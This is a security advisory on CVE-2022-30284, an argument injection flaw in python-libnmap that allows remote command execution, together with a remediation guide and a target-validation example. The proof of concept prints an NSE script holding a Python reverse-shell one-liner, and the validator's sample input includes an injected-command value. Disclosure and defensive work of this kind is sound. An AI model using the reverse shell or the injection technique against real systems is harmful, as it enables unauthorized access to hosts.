Security Advisory: Libnmap <= 0.7.2 (CVE-2022-30284)

Swascan Offensive Security Team has identified a severe vulnerability in the python-libnmap Python library (https://pypi.org/project/python-libnmap/).

Python-libnmap

Python-libnmap is a Python library that enables Python developers to manipulate nmap processes and scan data.

The library offers the following features:

  • automate or schedule nmap scans on a regular basis
  • manipulate nmap scans results to do reporting
  • compare and diff nmap scans to generate graphs
  • batch process scan reports
  • more…

Technical Summary

Swascan Offensive Security Team discovered an important vulnerability in python-libnmap <= 0.7.2.

Vulnerability: python-libnmap <= 0.7.2 – Argument Injection to Remote Command Execution
CVSSv3.1: 9.0 – Critical [AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H]

This library is vulnerable to an Argument Injection vulnerability leading to Remote Command Execution through the Nmap Scripting Engine (NSE).

The Swascan Offensive Security Team recommends that all developers using this Python library check for a fixed version and follow the recommendations reported below to make sure that the potential risk is mitigated.

Vulnerability details

Critical python-libnmap <= 0.7.2 – Argument Injection to Remote Command Execution

CWE-88: Argument Injection
CVSSv3.1: 9.0 [AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H]
OWASP: A03:2021 – Injection
Remediation Complexity: HIGH

Description

The library is vulnerable to an Argument Injection vulnerability leading to Remote Command Execution.

When the client application fails to validate user input, the library allows an attacker to inject arbitrary arguments into the final nmap command line executed on the underlying operating system, leading to the upload and execution of a custom Lua script through the Nmap Scripting Engine (NSE).

Proof of Concept

When the nmap process is spawned, the quoting is not closed correctly, as shown in this PoC:

If the client application does not correctly validate the targets argument value, an attacker could manipulate the nmap command line as shown in the following image:

Remote Code Execution then becomes possible by using the http-fetch script to upload the following NSE reverse shell script and executing it:

local handle = io.popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"127.0.0.1\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'")
local result = handle:read("*a")
handle:close()

After having uploaded the NSE reverse shell on the target system, it can be executed:

Impact

When exploited, this vulnerability gives an attacker access to the underlying operating system, and thus to the client application's data, with the privileges of the user running the application.

Remediation

At the time of writing, there is still no remediation at the library level, as the developer Ronald Bister has not released an update yet.

Developers using this Python library for nmap network or vulnerability scanning tasks must:

  • Update the library as soon as a newer version is released;
  • Ensure that the targets argument value, when instantiating the NmapProcess class, is correctly validated and does not contain invalid characters.

For a full remediation on the client application side, the targets argument value should be validated against the following use cases:

  • FQDNs
  • Simple hostnames (could be stored in /etc/hosts or completed by the domain or search suffix from resolv.conf)
  • IPv4+6
  • IPv4+6 CIDR notation
  • IPv4+6 series notation (e.g.: 192.138.5.1-5,8,9,266)
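The following validator is an added example written for this advisory, not code from python-libnmap or from its author. It implements the client-side remediation above as an allowlist: a target is accepted only if it parses as an IPv4/IPv6 address, an IPv4/IPv6 CIDR block, nmap's IPv4 octet-range ("series") notation, or a DNS hostname/FQDN, after first rejecting anything with a leading dash (which nmap would read as an option) or any character outside a small allowed set (so quotes, whitespace and shell metacharacters can never reach the command line). IPv6 is accepted only as a plain address or CIDR block, since nmap's octet-range syntax is IPv4-only; the function names and the 0-255 octet bound are this example's assumptions.

```python
import ipaddress
import re
from typing import Iterable, List

# Allowlist of characters a target may contain: letters, digits, '.', '-', ':', ',' and '/'.
# Anything else (space, quotes, ';', '|', '$', '&', newline, ...) is rejected up front, so no
# value can close the quoted argument or start a new one on the nmap command line.
_SAFE_CHARS = re.compile(r"[A-Za-z0-9.\-:,/]+")

# One DNS label: 1-63 chars of letters, digits and hyphens, no leading or trailing hyphen.
_DNS_LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")

# One element of an nmap IPv4 octet list: a single value ("8") or an inclusive range ("1-5").
_OCTET_ITEM = re.compile(r"(\d{1,3})(?:-(\d{1,3}))?")


def _is_ip_or_cidr(target: str) -> bool:
    """Plain IPv4/IPv6 address, or IPv4/IPv6 CIDR block (host bits may be set)."""
    try:
        ipaddress.ip_network(target, strict=False)
    except ValueError:
        return False
    return True


def _is_ipv4_series(target: str) -> bool:
    """nmap octet-range notation such as 192.168.5.1-5,8,9: exactly four octet fields,
    each a comma-separated list of values or ranges, every value within 0-255."""
    octets = target.split(".")
    if len(octets) != 4:
        return False
    for octet in octets:
        for item in octet.split(","):
            m = _OCTET_ITEM.fullmatch(item)
            if not m:
                return False
            low = int(m.group(1))
            high = int(m.group(2)) if m.group(2) else low
            if not (0 <= low <= high <= 255):
                return False
    return True


def _is_hostname(target: str) -> bool:
    """Simple hostname (e.g. resolved via /etc/hosts or a search suffix) or an FQDN,
    optionally with a trailing dot; the top-level label must contain a letter so that
    malformed all-numeric strings are not accepted as hostnames."""
    if len(target) > 253:
        return False
    labels = target[:-1].split(".") if target.endswith(".") else target.split(".")
    if not all(_DNS_LABEL.fullmatch(label) for label in labels):
        return False
    return any(ch.isalpha() for ch in labels[-1])


def is_valid_nmap_target(target: str) -> bool:
    """True only if the value is something an nmap scan target can legitimately be."""
    if not isinstance(target, str) or not target or target.startswith("-"):
        return False
    if not _SAFE_CHARS.fullmatch(target):
        return False
    return _is_ip_or_cidr(target) or _is_ipv4_series(target) or _is_hostname(target)


def validate_targets(targets: Iterable[str]) -> List[str]:
    """Return the targets as a list if every entry is valid; otherwise raise ValueError
    naming the rejected entries, so the caller never instantiates NmapProcess with them."""
    targets = list(targets)
    rejected = [t for t in targets if not is_valid_nmap_target(t)]
    if rejected:
        raise ValueError(f"rejected nmap target(s): {rejected!r}")
    return targets


if __name__ == "__main__":
    # Constructed sample input: a mix of valid forms plus one entry with a forbidden character.
    for candidate in ["scanme.nmap.org", "10.0.0.0/24", "2001:db8::1",
                      "192.168.5.1-5,8,9", "web01", '10.0.0.1";id']:
        print(f"{candidate!r}: {is_valid_nmap_target(candidate)}")
```

Each entry is validated separately, so one target per list element: a string such as "10.0.0.1 10.0.0.2" is rejected because the space is not in the allowed set. Note that the octet bound is 255, so a series like the "192.138.5.1-5,8,9,266" example above is rejected; a caller that needs nmap's own looser parsing would have to relax that check deliberately. Call validate_targets() on the user-supplied list before passing it to NmapProcess.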

Disclosure Timeline

  • 14-02-2022: Vulnerability discovered
  • 14-02-2022: Developer contacted by email
  • 15-02-2022: Report shared with the developer
  • 16-02-2022: Developer acknowledged the vulnerability
  • 16-02-2022: CVE ID requested
  • 25-04-2022: A fix is still not available; the developer agrees to publish
  • 02-05-2022: Official publication
  • 05-05-2022: Issued CVE ID CVE-2022-30284
